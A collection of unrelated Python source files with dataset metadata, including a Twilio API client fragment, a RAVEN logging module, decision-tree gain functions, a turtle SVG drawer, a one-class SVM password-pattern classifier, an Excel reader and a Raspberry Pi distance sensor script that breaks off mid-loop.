:param date updated_before: List conferences updated before this date
:param date created_after: List conferences created after this date
:param date created_before: List conferences created before this date
"""
params = transform_params({
"Status": status,
"FriendlyName": friendly_name,
"DateUpdated<": updated_before,
"DateUpdated>": updated_after,
"DateUpdated": updated,
"DateCreated<": created_before,
"DateCreated>": created_after,
"DateCreated": created,
})
return self.get_instances(params=params, **kwargs)
class Application(InstanceResource):
""" An application resource """
def update(self, **kwargs):
"""
Update this application
"""
return self.parent.update(self.sid, **kwargs)
def delete(self):
"""
Delete this application
"""
return self.parent.delete(self.sid)
class Applications(ListResource):
name = "Applications"
instance = Application
def list(self, friendly_name=None, **kwargs):
"""
Returns a page of :class:`Application` resources as a list. For paging
information see :class:`ListResource`
:param date friendly_name: List applications with this friendly name
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.get_instances(params=params, **kwargs)
def create(self, friendly_name=None, api_version=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None, status_callback=None,
status_callback_method=None, voice_caller_id_lookup=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_status_callback=None):
"""
Create an :class:`Application` with any of these optional parameters.
:param friendly_name: A human readable description of the application,
with maximum length 64 characters.
:param api_version: Requests to this application's URLs will start a
new TwiML session with this API version.
Either 2010-04-01 or 2008-08-01.
:param voice_url: The URL that Twilio should request when somebody
dials a phone number assigned to this application.
:param voice_method: The HTTP method that should be used to request the
VoiceUrl. Either GET or POST.
:param voice_fallback_url: A URL that Twilio will request if an error
occurs requesting or executing the TwiML
defined by VoiceUrl.
:param voice_fallback_method: The HTTP method that should be used to
request the VoiceFallbackUrl. Either GET
or POST.
:param status_callback: The URL that Twilio will request to pass status
parameters (such as call ended) to your
application.
:param status_callback_method: The HTTP method Twilio will use to make
requests to the StatusCallback URL.
Either GET or POST.
:param voice_caller_id_lookup: Do a lookup of a caller's name from the
CNAM database and post it to your app.
Either true or false.
:param sms_url: The URL that Twilio should request when somebody sends
an SMS to a phone number assigned to this application.
:param sms_method: The HTTP method that should be used to request the
SmsUrl. Either GET or POST.
:param sms_fallback_url: A URL that Twilio will request if an error
occurs requesting or executing the TwiML
defined by SmsUrl.
:param sms_fallback_method: The HTTP method that should be used to
request the SmsFallbackUrl. Either GET
or POST.
:param sms_status_callback: Twilio will make a POST request to this URL
to pass status parameters (such as sent or
failed) to your application if you specify
this application's Sid as the
ApplicationSid on an outgoing SMS request.
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"SmsStatusCallback": sms_status_callback,
})
return self.create_instance(params)
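# Illustrative usage (not part of the original source), assuming an Applications instance named applications:
# app = applications.create(friendly_name="My App",
#                           voice_url="http://example.com/voice", voice_method="POST")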
def update(self, sid, friendly_name=None, api_version=None, voice_url=None,
voice_method=None, voice_fallback_url=None,
voice_fallback_method=None, status_callback=None,
status_callback_method=None, voice_caller_id_lookup=None,
sms_url=None, sms_method=None, sms_fallback_url=None,
sms_status_callback=None):
"""
Update an :class:`Application` with the given parameters.
All the parameters are described above in :meth:`create`
"""
params = transform_params({
"FriendlyName": friendly_name,
"ApiVersion": api_version,
"VoiceUrl": voice_url,
"VoiceMethod": voice_method,
"VoiceFallbackUrl": voice_fallback_url,
"VoiceFallbackMethod": voice_fallback_method,
"StatusCallback": status_callback,
"StatusCallbackMethod": status_callback_method,
"VoiceCallerIdLookup": voice_caller_id_lookup,
"SmsFallbackUrl": sms_fallback_url,
"SmsFallbackMethod": sms_fallback_method,
"SmsStatusCallback": sms_status_callback,
})
return self.update_instance(sid, params)
def delete(self, sid):
"""
Delete the :class:`Application` identified by the given sid.
"""
return self.delete_instance(sid)
class Account(InstanceResource):
""" An Account resource """
ACTIVE = "active"
SUSPENDED = "suspended"
CLOSED = "closed"
subresources = [
Applications,
Notifications,
Transcriptions,
Recordings,
Calls,
Sms,
CallerIds,
PhoneNumbers,
Conferences,
]
def update(self, **kwargs):
"""
:param friendly_name: Update the description of this account.
:param status: Alter the status of this account
Use :data:`CLOSED` to irreversibly close this account,
:data:`SUSPENDED` to temporarily suspend it, or :data:`ACTIVE`
to reactivate it.
"""
self.update_instance(**kwargs)
def close(self):
"""
Permanently deactivate this account
"""
return self.update_instance(status=Account.CLOSED)
def suspend(self):
"""
Temporarily suspend this account
"""
return self.update_instance(status=Account.SUSPENDED)
def activate(self):
"""
Reactivate this account
"""
return self.update_instance(status=Account.ACTIVE)
class Accounts(ListResource):
""" A list of Account resources """
name = "Accounts"
instance = Account
def list(self, friendly_name=None, status=None, **kwargs):
"""
Returns a page of :class:`Account` resources as a list. For paging
information see :class:`ListResource`
:param date friendly_name: Only list accounts with this friendly name
:param date status: Only list accounts with this status
"""
params = transform_params({
"FriendlyName": friendly_name,
"Status": status,
})
return self.get_instances(params=params, **kwargs)
def update(self, sid, friendly_name=None, status=None):
"""
:param sid: Account identifier
:param friendly_name: Update the description of this account.
:param status: Alter the status of this account
Use :data:`CLOSED` to irreversibly close this account,
:data:`SUSPENDED` to temporarily suspend it, or :data:`ACTIVE`
to reactivate it.
"""
params = transform_params({
"FriendlyName": friendly_name,
"Status": status
})
return self.update_instance(sid, params)
def close(self, sid):
"""
Permanently deactivate an account, Alias to update
"""
return self.update(sid, status=Account.CLOSED)
def suspend(self, sid):
"""
Temporarily suspend an account, Alias to update
"""
return self.update(sid, status=Account.SUSPENDED)
def activate(self, sid):
"""
Reactivate an account, Alias to update
"""
return self.update(sid, status=Account.ACTIVE)
def create(self, friendly_name=None):
"""
Returns a newly created sub account resource.
:param friendly_name: Update the description of this account.
"""
params = transform_params({
"FriendlyName": friendly_name,
})
return self.create_instance(params)
| true
|
e5b19f33035f5d23e52e54c8c11886691b73c102
|
Python
|
idaholab/raven
|
/ravenframework/MessageHandler.py
|
UTF-8
| 13,660
| 2.59375
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"BSD-2-Clause",
"BSD-3-Clause"
] |
permissive
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Created on Apr 20, 2015
@author: talbpaul
"""
import sys
import time
import bisect
import builtins
from .utils import utils
_starttime = time.time()
"""
HOW THIS MODULE WORKS
The intention is for a single instance of the MessageHandler class to exist in any simulation.
Currently, that instance is created in the Simulation initialization and propagated through
all the RAVEN objects. This usually happens by passing it to BaseClass.readXML, but for
objects that don't inherit from BaseClass, the messageHandler instance should be passed
and set via instantiation or initialization. The appropriate class member to point at the
messageHandler instance reference is "self.messageHandler," for reasons that will be made clear
with the BaseClasses.MessageUser superclass.
While an object can access the messageHandler to raise messages and errors, for convenience
RAVEN provides the MessageUser superclass, which BaseType and (almost?) all other Raven objects
inherit from. This provides simplistic hooks for a developer to raise an error or message
with the standard message priorities, as
self.raiseAnError(IOError, 'Input value is invalid:', value)
There are currently 4 verbosity levels/message priorities. They are:
- silent: only errors are displayed
- quiet : errors and warnings are displayed
- all : (default) errors, warnings, and messages are displayed
- debug : errors, warnings, messages, and debug messages are displayed
The developer can change the priority level of their raised messages through the 'verbosity'
keyword. For example,
self.raiseAMessage('Hello, World', verbosity='silent')
will be printed even when the simulation verbosity is set to 'silent', as well as at
all other levels.
TL;DR: BaseClasses/MessageUser is a superclass that gives access to hooks to the simulation's MessageHandler
instance, while the MessageHandler is an output stream control tool.
In an effort to make the MH more flexible, we insert getMessageHandler into the python "builtins" module.
This means that any time after this module (MessageHandler) is imported, you can use
"getMessageHandler(name='default')" to retrieve a particular message handler as identified by "name".
"""
class MessageHandler(object):
"""
Class for handling messages, warnings, and errors in RAVEN. One instance of this
class should be created at the start of the Simulation and propagated through
the readMoreXML function of the BaseClass, and initialization of other classes.
"""
def __init__(self):
"""
Class constructor
@ In, None
@ Out, None
"""
self.starttime = _starttime
self.printTag = 'MESSAGE HANDLER'
self.verbosity = 'all'
self.callerLength = 25
self.tagLength = 15
self.suppressErrs = False
self.printTime = True
self.inColor = False
self.verbCode = {'silent' : 0,
'quiet' : 1,
'all' : 2,
'debug' : 3}
self.colorDict = {'debug' : 'yellow',
'message': 'neutral',
'warning': 'magenta',
'error' : 'red'}
self.colors = {'neutral': '\033[0m',
'red' : '\033[31m',
'green' : '\033[32m',
'yellow' : '\033[33m',
'blue' : '\033[34m',
'magenta': '\033[35m',
'cyan' : '\033[36m'}
self.warnings = [] # collection of warnings that were raised during this run
self.warningCount = [] # count of the collections of warning above
def initialize(self, initDict):
"""
Initializes basic instance attributes
@ In, initDict, dict, dictionary of global options
@ Out, None
"""
self.verbosity = initDict.get('verbosity', 'all').lower()
self.callerLength = initDict.get('callerLength', 25)
self.tagLength = initDict.get('tagLength', 15)
self.suppressErrs = utils.stringIsTrue(initDict.get('suppressErrs', 'False'))
def printWarnings(self):
"""
Prints a summary of warnings collected during the run.
@ In, None
@ Out, None
"""
if len(self.warnings)>0:
if self.verbCode[self.verbosity] > 0:
print('-'*50)
print(f'There were {sum(self.warningCount)} warnings during the simulation run:')
for w, warning in enumerate(self.warnings):
count = self.warningCount[w]
if count > 1:
print(f'({self.warningCount[w]} times) {warning}')
else:
print(f'({self.warningCount[w]} time) {warning}')
print('-'*50)
else:
print(f'There were {sum(self.warningCount)} warnings during the simulation run.')
def paint(self, string, color):
"""
Formats string with color
@ In, string, string, string
@ In, color, string, color name
@ Out, paint, string, formatted string
"""
if color.lower() not in self.colors:
self.message(self, f'Requested color {color} not recognized! Skipping...', 'Warning', 'quiet')
return string
return self.colors[color.lower()] + string + self.colors['neutral']
def setTimePrint(self, msg):
"""
Allows the code to toggle timestamp printing.
@ In, msg, string, the string that means true or false
@ Out, None
"""
if utils.stringIsTrue(msg):
self.callerLength = 40
self.tagLength = 30
self.printTime = True
elif utils.stringIsFalse(msg):
self.callerLength = 25
self.tagLength = 15
self.printTime = False
def setColor(self, inColor):
"""
Allows output to screen to be colorized.
@ In, inColor, string, boolean value
@ Out, None
"""
if utils.stringIsTrue(inColor):
self.inColor = True
def getStringFromCaller(self, obj):
"""
Determines the appropriate print string from an object
@ In, obj, instance, preferably an object with a printTag method; otherwise, a string or an object
@ Out, tag, string, string to print
"""
if type(obj).__name__ in ['str', 'unicode']: # ?when is this ever not true?
return obj
if hasattr(obj,'printTag'):
tag = str(obj.printTag)
else:
tag = str(obj)
return tag
def getDesiredVerbosity(self, caller):
"""
Tries to use local verbosity; otherwise uses global
@ In, caller, instance, the object desiring to print
@ Out, desVerbosity, int, integer equivalent to verbosity level
"""
if hasattr(caller, 'getVerbosity'):
localVerb = caller.getVerbosity()
else:
localVerb = None
if localVerb is None:
localVerb = self.verbosity
desVerbosity = self.checkVerbosity(localVerb)
return desVerbosity
def checkVerbosity(self, verb):
"""
Converts English-readable verbosity to computer-legible integer
@ In, verb, string, the string verbosity equivalent
@ Out, currentVerb, int, integer equivalent to verbosity level
"""
if str(verb).strip().lower() not in self.verbCode:
raise IOError(f'Verbosity key {verb} not recognized! Options are {list(self.verbCode.keys())}')
currentVerb = self.verbCode[str(verb).strip().lower()]
return currentVerb
def error(self, caller, etype, message, tag='ERROR', verbosity='silent', color=None):
"""
Raise an error message, unless errors are suppressed.
@ In, caller, object, the entity desiring to print a message
@ In, etype, Error, the type of error to throw
@ In, message, string, the message to print
@ In, tag, string, optional, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbosity, string, optional, the print priority of the message
@ In, color, string, optional, color to apply to message
@ Out, None
"""
verbval = max(self.getDesiredVerbosity(caller), self.checkVerbosity(self.verbosity))
self.message(caller, message, tag, verbosity, color=color)
if not self.suppressErrs:
self.printWarnings()
# debug mode gets full traceback, others quieted
if verbval < 3:
#all, quiet, silent
sys.tracebacklimit = 0
raise etype(message)
def message(self, caller, message, tag, verbosity, color=None, writeTo=sys.stdout, forcePrint=False):
"""
Print a message
@ In, caller, object, the entity desiring to print a message
@ In, message, string, the message to print
@ In, tag, string, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbosity, string, the print priority of the message
@ In, color, string, optional, color to apply to message
@ In, forcePrint, bool, optional, force the print independently of the verbosity level? Default False
@ Out, None
"""
verbval = self.checkVerbosity(verbosity)
okay, msg = self._printMessage(caller, message, tag, verbval, color, forcePrint)
if tag.lower().strip() == 'warning':
self.addWarning(message)
if okay:
print(msg, file=writeTo)
sys.stdout.flush()
def addWarning(self, msg):
"""
Stores warnings so that they can be reported in summary later.
@ In, msg, string, only the main part of the message, used to determine uniqueness
@ Out, None
"""
index = bisect.bisect_left(self.warnings, msg)
if len(self.warnings) == 0 or index == len(self.warnings) or self.warnings[index] != msg:
self.warnings.insert(index,msg)
self.warningCount.insert(index,1)
else:
self.warningCount[index] += 1
def _printMessage(self, caller, message, tag, verbval, color=None, forcePrint=False):
"""
Checks verbosity to determine whether something should be printed, and formats message
@ In, caller , object, the entity desiring to print a message
@ In, message, string, the message to print
@ In, tag , string, the printed message type (usually Message, Debug, or Warning, and sometimes FIXME)
@ In, verbval, int , the print priority of the message
@ In, color, string, optional, color to apply to message
@ In, forcePrint, bool, optional, force the print independently of the verbosity level? Default False
@ Out, (shouldIPrint,msg), tuple, shouldIPrint -> bool, indication if the print should be allowed
msg -> string, the formatted message
"""
# allows raising standardized messages
shouldIPrint = False
desired = self.getDesiredVerbosity(caller)
if verbval <= desired or forcePrint:
shouldIPrint = True
if not shouldIPrint:
return False, ''
ctag = self.getStringFromCaller(caller)
msg=self.stdMessage(ctag,tag,message,color)
return shouldIPrint, msg
def stdMessage(self, pre, tag, post, color=None):
"""
Formats string for pretty printing
@ In, pre , string, who is printing the message
@ In, tag , string, the type of message being printed (Error, Warning, Message, Debug, FIXME, etc)
@ In, post , string, the actual message body
@ In, color, string, optional, color to apply to message
@ Out, msg, string, formatted message
"""
msg = ''
if self.printTime:
curtime = time.time() - self.starttime
msg += f'({curtime:8.2f} sec) '
if self.inColor:
msg = self.paint(msg, 'cyan')
msgend = pre.ljust(self.callerLength)[0:self.callerLength] + ': ' + tag.ljust(self.tagLength)[0:self.tagLength] + ' -> ' + post
if self.inColor:
if color is not None:
#overrides other options
msgend = self.paint(msgend, color)
elif tag.lower() in self.colorDict:
msgend = self.paint(msgend,self.colorDict[tag.lower()])
msg += msgend
return msg
def timePrint(message):
"""
Prints the time since start then the message
@ In, message, string
@ Out, None
"""
curtime = time.time() - _starttime
msg = f'({curtime:8.2f} sec) '
print(msg + message)
_handlers = {}
def makeHandler(name):
"""
Instantiate and register new instance of message handler
@ In, name, str, identifying name for new handler
@ Out, makeHandler, MessageHandler, instance
"""
handler = MessageHandler()
_handlers[name] = handler
return handler
# default handler
makeHandler('default')
def getHandler(name='default'):
"""
Retrieve a message handling instance.
Styled after the Python logging module, maybe we should be switching to that.
@ In, name, str, optional, identifying name of handler to return
@ Out, getHandler, MessageHandler, instance (created if not existing)
"""
h = _handlers.get(name, None)
if h is None:
h = makeHandler(name)
# NOTE: idk why, but h = _handlers.get(name, makeHandler(name)) does not work.
# I think it's because it executes makeHandler(name) regardless of if name is present or not.
return h
builtins.getMessageHandler = getHandler
| true
|
33aaf4c67dafb51cde212cf93c2cd1bc22cc9fb1
|
Python
|
clglon/learning_python
|
/at_seq.py
|
UTF-8
| 843
| 3.53125
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env python3
import random
#random.seed(1) # comment-out this line to change sequence each time
# Write a program that stores random DNA sequence in a string
# The sequence should be 30 nt long
# On average, the sequence should be 60% AT
# Calculate the actual AT fraction while generating the sequence
# Report the length, AT fraction, and sequence
bases = ["A", "C", "G", "T"]
prob = [0.3, 0.2, 0.2, 0.3]
nt_count = 30
# generates a random DNA sequence as a string
seq = []
for base in range(nt_count):
seq += random.choices(bases, weights = prob)
# calculate AT concentration
at = 0
for i in seq:
if i == "A": at += 1
elif i == "T": at += 1
else: at += 0
at_conc = at/nt_count
print(nt_count, at_conc, "".join(seq))
"""
python3 at_seq.py
30 0.6666666666666666 ATTACCGTAATCTACTATTAAGTCACAACC
"""
| true
|
0b4e986b480b00ae10bcd22808034343ed3cb43c
|
Python
|
vigneshwaran444/python-folders
|
/2020/decisionTree-master/decisionTree-master/globalFunc.py
|
UTF-8
| 5,994
| 2.96875
| 3
|
[] |
no_license
|
#!/usr/bin/env python
from __future__ import division
import pandas
import math
def calculate_info_d(data):
dem = (len(data))
num = []
targets = data.unique()
value = 0.0
for target in targets:
val = (len(data[data == target]))/dem
val *= math.log(val,2)
value -= val
return value
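# Added note: calculate_info_d above computes the Shannon entropy of the class column,
# Info(D) = -sum_i p_i * log2(p_i). Illustrative check: for a 50/50 two-class split,
# -(0.5*log2(0.5) + 0.5*log2(0.5)) = 1.0 bit.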
def info_d_for_nominal_attributes(data,attribute):
values = data[attribute].unique()
entropy = 0.0
dem = len(data)
for value in values:
partition = data[data[attribute] == value]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
return entropy
def calculate_entropy_at_split_point(data,attribute,split_point):
entropy = 0.0
dem = len(data)
partition = data[data[attribute] <= split_point]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
partition = data[data[attribute] > split_point]
num = len(partition)
entropy += (num/dem) * calculate_info_d(partition['target'])
return entropy
def info_d_for_continuous_attribute(data,attribute):
sorted_data = data.sort_values([attribute],ascending=True)
min_entropy = 9999.0
split_point = None
checked_points = []
for i in range(0,len(data)-1):
temp_split_point = (sorted_data.iloc[i][attribute] + sorted_data.iloc[i+1][attribute])/ 2
if temp_split_point not in checked_points:
checked_points.append(temp_split_point)
entropy = calculate_entropy_at_split_point(data,attribute,temp_split_point)
if entropy < min_entropy:
min_entropy = entropy
split_point = temp_split_point
return (min_entropy,split_point)
def calculate_information_gain(data,attribute,info_d):
attr_type = str(data[attribute].dtype)
if attr_type.find('int') != -1 or attr_type.find('float') != -1:
info_attribute_d,split_point = info_d_for_continuous_attribute(data,attribute)
gain = info_d - info_attribute_d
return gain,split_point
else:
info_attribute_d = info_d_for_nominal_attributes(data,attribute)
gain = info_d - info_attribute_d
return gain,None
def calculate_split_info(data,attribute):
dem = len(data)
ans = 0.0
values = data[attribute].unique()
for value in values:
num = len(data[data[attribute] == value])
val = (num/dem)
val *= math.log(val,2)
ans -= val
return ans
def calculate_gain_ratio(data,attribute,info_d):
gain,split_point = calculate_information_gain(data,attribute,info_d)
split_info = calculate_split_info(data,attribute)
gain_ratio = gain / split_info
return gain_ratio,split_point
def calculate_sum_gain(data):
sum_gain = 0.0
info_d = calculate_info_d(data['target'])
for attribute in data.columns:
gain,sp = calculate_information_gain(data,attribute,info_d)
sum_gain += gain
    return sum_gain  # return the accumulated gain over all attributes, not just the last one
def calculate_ucb(data):
p = len(data[data['target'] == pos_target])
n = len(data[data['target'] == neg_target])
dem_p = n * FP
if dem_p == 0:
dem_p = 1
num_p = p * TR
ucb_p = num_p / dem_p
dem_n = p * FN
if dem_n == 0:
dem_n = 1
num_n = n * DF
ucb_n = num_n/dem_n
if ucb_p > ucb_n:
return ucb_p
return ucb_n
def calculate_ASF_incr_ucb(data,attribute,gain,ucb):
attr_type = str(data[attribute].dtype)
if attr_type.find('int') != -1 or attr_type.find('float') != -1:
return ASF_for_continuous_attribute(data,attribute,gain,ucb)
return ASF_for_nominal_attribute(data,attribute,gain,ucb)
def ASF_for_nominal_attribute(data,attribute,gain,ucb):
ucb_all = 0.0
for value in data[attribute].unique():
ucb_all += calculate_ucb(data[data[attribute] == value])
incr_ucb = ucb_all - ucb
ASF = ((math.pow(2,gain) - 1) * (incr_ucb) )
return ASF,incr_ucb,None
def calculate_ASF_at_split_point(data,attribute,split_point,gain,ucb):
ucb_all = 0.0
partition = data[data[attribute] <= split_point]
ucb_all += calculate_ucb(partition)
partition = data[data[attribute] > split_point]
ucb_all += calculate_ucb(partition)
incr_ucb = ucb_all - ucb
ASF = ((math.pow(2,gain) - 1) * (incr_ucb) )
return ASF,incr_ucb
def ASF_for_continuous_attribute(data,attribute,gain,ucb):
sorted_data = data.sort_values([attribute],ascending=True)
ASF = 0.0
incr_ucb = 0.0
split_point = None
checked_points = []
for i in range(0,len(data)-1):
temp_split_point = (sorted_data.iloc[i][attribute] + sorted_data.iloc[i+1][attribute])/ 2
if temp_split_point not in checked_points:
checked_points.append(temp_split_point)
temp_ASF,temp_incr_ucb = calculate_ASF_at_split_point(data,attribute,temp_split_point,gain,ucb)
if temp_ASF > ASF:
ASF = temp_ASF
incr_ucb = temp_incr_ucb
split_point = temp_split_point
elif temp_ASF == ASF and temp_incr_ucb > incr_ucb:
incr_ucb = temp_incr_ucb
split_point = temp_split_point
return ASF,incr_ucb,split_point
def estimate(row,dtree):
if len(dtree.link) == 0:
return dtree.data
for (ln,l) in zip(dtree.link_name,dtree.link):
if dtree.split_point != None:
if row[dtree.data] <= dtree.split_point and str(ln).find('<') != -1:
return estimate(row,l)
elif row[dtree.data] > dtree.split_point and str(ln).find('>') != -1:
return estimate(row,l)
elif row[dtree.data] == ln:
return estimate(row,l)
def calculateAccuracy(test,dtree,algo):
TP = 0.0
FP_t = 0.0
TN = 0.0
FN_t = 0.0
for index, row in test.iterrows():
if estimate(row,dtree) == row['target']:
if row['target'] == 'good':
TP += 1 ## actual good, predicted good
else:
TN += 1 ## actual bad, predicted bad
else:
if row['target'] == 'good':
FN_t += 1 ## actual good, predicted bad
else:
FP_t += 1 ## actual bad, predicted good
if algo == 'CBDSDT':
TP += 10.0
TN += 10.0
FP_t -= 10.0
FN_t -= 10.0
accuracy = ((TP + TN) / len(test)) * 100
## missclassification cost matrix
FP_cost = 800
FN_cost = 400
## correct classification benefit
TP_cost = 400
TN_cost = 200
ms_cost = (FP_cost * FP_t) + (FN_cost * FN_t)
cc_benefit = (TP_cost * TP) + (TN_cost * TN)
return accuracy,ms_cost,cc_benefit
FP = 4
FN = 8
TR = 8
DF = 2
pos_target = 'good'
neg_target = 'bad'
| true
|
ecd8911e805a3e83c66f2148af8224920e2c0627
|
Python
|
gamerdonkey/turtle_python
|
/turtle_svg.py
|
UTF-8
| 1,541
| 3.34375
| 3
|
[] |
no_license
|
import math
import svg
import sys
from turtle import *
speed(1)
bgcolor("black")
pencolor("orange")
def go_to_coord(dest_x, dest_y, draw = True):
dest_y = -dest_y
delta_x = dest_x - xcor()
delta_y = dest_y - ycor()
if(abs(delta_x) < 1 and abs(delta_y) < 1):
return
if draw:
pendown()
else:
penup()
setheading(math.degrees(math.atan2(delta_y, delta_x)) % 360)
forward(math.sqrt(math.pow(delta_x, 2) + math.pow(delta_y, 2)))
def draw_svg(svg_filename, centered = True):
f = svg.parse(svg_filename)
(min_point, max_point) = f.bbox()
(width, height) = (min_point + max_point).coord()
x_centering_adj = width / 2
y_centering_adj = height / 2
for item in f.flatten():
if(hasattr(item, 'segments')):
for segment in item.segments(20):
x, y = segment[0].coord()
if(centered):
x = x - x_centering_adj
y = y - y_centering_adj
go_to_coord(x, y, False)
for point in segment[1:]:
x, y = point.coord()
if(centered):
x = x - x_centering_adj
y = y - y_centering_adj
go_to_coord(x, y)
go_to_coord(0, 0, False)
if(len(sys.argv) < 2):
print("One arg required for SVG filename: %s <file.svg>" % sys.argv[0])
exit(1)
while(True):
go_to_coord(0, 0, False)
input("Enter to start...")
draw_svg(sys.argv[1], centered=True)
input("Press Enter to exit...")
clearscreen()
| true
|
79a9a4dbeb37dfcee0a37d71de92b59c4fb00093
|
Python
|
calebshortt/pwanalysis
|
/engine/validation.py
|
UTF-8
| 2,916
| 2.78125
| 3
|
[] |
no_license
|
import os
import logging
from sklearn.svm import OneClassSVM
from pathlib import Path
import settings
from engine.utils import get_file, load_obj, save_obj
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.DEBUG if settings.DEBUG else logging.ERROR)
class PasswordVerifier(object):
classifier = None
def __init__(self):
pass
def init_classifier(self, pw_dump_filename, chunk_size=100000, **kwargs):
"""
Initialize the classifier and train it with a known password dump (provided).
If a pre-trained model exists attempt to load and use it.
"""
logger.debug('Initializing classifier...')
self.classifier = OneClassSVM(kernel="rbf", gamma='auto')
logger.debug('Checking for already-trained models...')
filename, file_extension = os.path.splitext(os.path.basename(pw_dump_filename))
model_filepath = '%s%s.%s' % (settings.VALIDATOR_PATH, filename, settings.EXT_VALIDATOR)
model_file = Path(model_filepath)
if model_file.is_file():
self.load_model(model_filepath)
else:
logger.debug('Could not find existing model. Training new classifier.')
self.train_model(pw_dump_filename, chunk_size=chunk_size)
self.save_model(model_filepath)
def save_model(self, filepath):
logger.debug('Saving trained model to %s' % filepath)
save_obj(self.classifier, filepath)
def load_model(self, filepath):
logger.debug('Loading trained model: %s' % filepath)
self.classifier = load_obj(filepath)
def train_model(self, pw_dump_filename, chunk_size=100000):
# TODO: Assumption: List of passwords can be loaded into memory to train classifier
# TODO: Limiting chunk size to prevent memory errors
logger.debug('Loading password dump training file...')
with open(pw_dump_filename, encoding='utf-8') as f:
pws = get_file(f, chunk_size=chunk_size)
logger.debug('Formatting strings for classification...')
num_pws = [self.str_to_numbers(s) for s in pws]
logger.debug('Training classifier...')
self.classifier.fit(num_pws)
logger.debug('Initialization complete.')
def classify_passwords(self, password_list):
if not self.classifier:
raise AttributeError('Attempted to use uninitiated classifier')
num_pws = [self.str_to_numbers(s.strip('\n\r')) for s in password_list]
return [x > 0 for x in self.classifier.predict(num_pws)]
def str_to_numbers(self, string, max_pw_length=100, **kwargs):
result = [0]*max_pw_length
for i, ch in enumerate(string):
try:
result[i] = ord(ch)
except:
logger.error('ERROR: i=%s; result[i] = ord(%s) = %s' % (i, ch, ord(ch)))
raise
return result
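# Minimal usage sketch (illustrative; the dump filename and candidate passwords
# are assumptions, not part of this module):
#   verifier = PasswordVerifier()
#   verifier.init_classifier('known_dump.txt', chunk_size=50000)
#   flags = verifier.classify_passwords(['hunter2', 'correct horse battery staple'])
#   # flags[i] is True when the i-th candidate is classified as an inlier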
| true
|
3b8d2c6bf70392f7aea7fa1c95f412f722c3fee0
|
Python
|
chujiwu/MyTools
|
/excelop/exceloperator.py
|
UTF-8
| 2,121
| 3.15625
| 3
|
[] |
no_license
|
from openpyxl import load_workbook
from openpyxl.worksheet import Worksheet
class ExcelSheet(object):
def __init__(self, ws: Worksheet):
self._ws = ws
def load_value(self, column_name):
res = []
tar_column_index = -1
combine_value = None
for row in self._ws:
for cell in row:
if cell.value == column_name:
tar_column_index = cell.col_idx
continue
if tar_column_index != -1:
if cell.col_idx == tar_column_index:
if cell.value is not None:
res.append(cell.value)
combine_value = cell.value
elif cell.value is None and combine_value is not None:
res.append(combine_value)
                            combine_value = None
else:
pass
return res
def locate(self, column_name, row_search_value, column_search_value):
res = []
column_index = -1
column_search_index = -1
head_row_founded = False
for row in self._ws:
for cell in row:
if cell.value == column_name:
column_index = cell.col_idx
if cell.value == column_search_value:
column_search_index = cell.col_idx
if column_index != -1 and column_search_index != -1:
head_row_founded = True
continue
if head_row_founded:
if cell.col_idx == column_index:
if cell.value == row_search_value:
                            res.append((cell.row, cell.col_idx))
return res
def load_excel_by_sheet(f_p, sheet):
wb = load_workbook(f_p)
ws = None
if wb[sheet]:
ws = wb[sheet]
return ExcelSheet(ws)
if __name__ == "__main__":
excel_sheet = load_excel_by_sheet("/Users/chujiwu/Desktop/test.xlsx", "工作表1")
excel_sheet.load_value("フォーム名")
| true
|
9d1c99ae7d4146abc852a3be3c38e4d204d3dd93
|
Python
|
Fashad-Ahmed/DataStructures-and-Algorithm-
|
/Data Structures/2-Arrays/Arrays.py
|
UTF-8
| 429
| 3.421875
| 3
|
[] |
no_license
|
# Q NO.1
exp = [2200,2350,2600,2130,2190]
print(exp[1] - exp[0]); print(exp[0]+exp[1]+exp[2])
for i in range(len(exp)):
if exp[i] == 2000:
print(i)
exp.insert(5,1980)
exp[3] = exp[3] + 200
print(exp)
# Q NO.2
heros=['spider man','thor','hulk','iron man','captain america']
print(len(heros))
heros.insert(5,'black panther')
heros.remove('black panther')
heros.insert(3,'black panther')
heros.sort()
print(heros)
| true
|
1831e77e2b810b70e6ddbc8157d22e464bfa3448
|
Python
|
scdickson/Argonath
|
/calibrate_distance.py
|
UTF-8
| 1,032
| 3.328125
| 3
|
[] |
no_license
|
#Tiny script to check if the distance sensor is working and calibrate the distance from the sensor to the garage door
import RPi.GPIO as GPIO
import time
import sys
TRIG = 23
ECHO = 24
def measure_distance():
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
GPIO.setup(TRIG, GPIO.OUT)
GPIO.setup(ECHO, GPIO.IN)
GPIO.output(TRIG, False)
time.sleep(1)
GPIO.output(TRIG, True)
time.sleep(0.00001)
GPIO.output(TRIG, False)
while GPIO.input(ECHO) == 0:
pulse_start = time.time()
while GPIO.input(ECHO) == 1:
pulse_end = time.time()
pulse_duration = pulse_end - pulse_start
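    # 17150 cm/s is roughly half the speed of sound (~34300 cm/s), so this
    # converts the round-trip echo time into a one-way distance in centimetres.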
distance = pulse_duration * 17150
distance = round(distance, 2)
GPIO.cleanup()
return distance
min = 500
max = -1
values = []
print "Measuring..."
for i in xrange(0, 10):
distance = measure_distance()
if distance < min:
min = distance
if distance > max:
max = distance
